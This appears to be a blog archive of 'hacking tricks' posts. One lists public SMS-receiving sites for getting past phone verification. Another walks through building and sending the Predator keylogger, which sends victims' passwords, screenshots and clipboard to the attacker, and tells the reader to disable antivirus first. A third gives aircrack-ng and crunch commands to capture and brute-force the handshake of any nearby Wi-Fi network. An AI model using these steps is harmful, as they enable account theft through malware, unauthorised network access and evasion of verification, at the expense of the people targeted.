Showing posts with label Hacking Tricks. Show all posts
Showing posts with label Hacking Tricks. Show all posts

Saturday, July 16, 2016

How To Bypass SMS Verification Of Any Website/Service


There are many free SMS receive services available online. Some of them are given below:

  • http://receivesmsonline.in
  • http://hs3x.com
  • http://sms-receive.net
  • http://www.receive-sms-now.com
  • http://www.receivesmsonline.net
  • http://receive-sms-online.com
  • http://receive-sms.com
  • http://receivesmsonline.com
  • http://receivefreesms.net
  • http://receive-a-sms.com
  • https://www.textmagic.com/free-tools/receive-free-sms-online
  • http://hs3x.com
  • http://receivesmsonline.in
  • http://www.receive-sms-now.com
  • http://receivefreesms.net
  • http://receivesmsonline.com
  • https://www.receivesmsonline.net
  • http://freesmsverification.com
  • http://receive-sms.com
  • https://smsreceivefree.com
  • http://www.e-receivesms.com
  • http://sms.sellaite.com
  • http://freereceivesmsonline.com
  • http://receiveonlinesms.biz
  • http://receivesmsonline.eu
  • http://getsms.org
  • http://receive-sms-online.com
  • http://receivefreesms.com
  • https://sms-online.co
  • http://mfreesms.com/receivesms.php
  • http://www.esendex.com.au/send-sms-online
  • http://www.textlocal.com/receiving-text-messages-online
  • https://www.proovl.com/numbers
  • http://receivesmsverification.com
  • http://receivesmsonline.me
  • http://www.virtty.com/en
You Can Use any of Them To Receive MSG and To Verify. We Take An Example of  http://www.receive-sms-now.com/

goto URL and Choose any Number as Shown in image.and put that Number To Make a Private Account.

Now You Will See Live Messages Received on that Number.

Monday, December 14, 2015

How To Hack Password Facebook,Gmail,MSN any Using Predator

Predator is a Key Logger Which can collects information From the Victom's PC and Send It To the Hackers.

Predator is a Powerful Key-Logger and With Much Interested Options and Commands. You can Build a System exe and Send it to Some one to Hack Accounts. When The user open it ,it automatically executes in system drive and start its work.

You Can Use Ftp Server, Php online Page and Also Your Email Address To Receive Emails With All Information include all types of  Username and Password , Screen Shots ,Clipboard .


















How TO : 


  • First of All Disable Your Antivirus.(antivirus , anti spyware Security Updates)
  • Extract Zip. and Open Predator v13 RUN THIS.exe
  • Select PHP, FTP or Email To Receive Information and enter Your Information here(Screenshot 1)
  • In Settings tab Choose Your Options To Attack Victoms PC(Screenshot 2)
  • Last Tab Build is to Create an executeable App.(Screenshot 3)
  • Now Send This To Your Friends and Tell Them That You Have Hacked Their Accounts And They Would be Impressed. :)
(Note: This Information is Educational Purpose only and Please Not to use to harm anybody) 





Screenshot 1 :



Screenshot 2 :



Screenshot 3 :



How To Cure From Predator :

To Vaccination of a System You need to Just Click on Cure in top Header of Predator 13.



Download Links : Predator 13

How To Hack WiFi Password Using Linux ?

How to hack WiFi password in Linux :

Well you can hack any wifi near you if you are using Linux specially Kali Linux.Many people use dictionary attacks but we are going to discuss a new and much powerful attack known as crunch.

As every one uses passwords of length 8-12 digits and in most cases it is numeric(0-9) or (a-z) or (A-Z).
When every method of hacking wifi fails this method comes in action.As it checks all possible combinations of the words which you type.

Step 1 :open terminal
Step 2 :type ifconfig.
Step 3 :type airmon-ng start wlan0  (zero not o)
Step 4 :now you get mon0 or mon1 at the end of command after performing step2.Note this name as we will use it in next steps
Step 5 :airodump-ng mon0(as i have monitoring mode enabled at mon0)
Step 6 :airodump-ng mon0 --bssid [bssid of network you want to hack] --channel [its CH no] --write yourfilename
when you see a handshake has been developed now its time to crack it.press cntrl+c to stop picking packets.Now try to find password by using crunch command.

crunch 8 12 0123456789 | aircrack-ng --bssid ag:ad:ff:33:22:11 -w- yourfilename.cap

8 means minimum 8 characters
12 means max 12 chars of password
0-9 means only check for numeric pass you can use abc...zABC....Z to check for all possible combinations .
like
crunch 8 12 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 | aircrack-ng --bssid ag:ad:ff:33:22:11 -w- yourfilename.cap

Now sit back and wait as this method takes lot of time but it will crack any password of the world.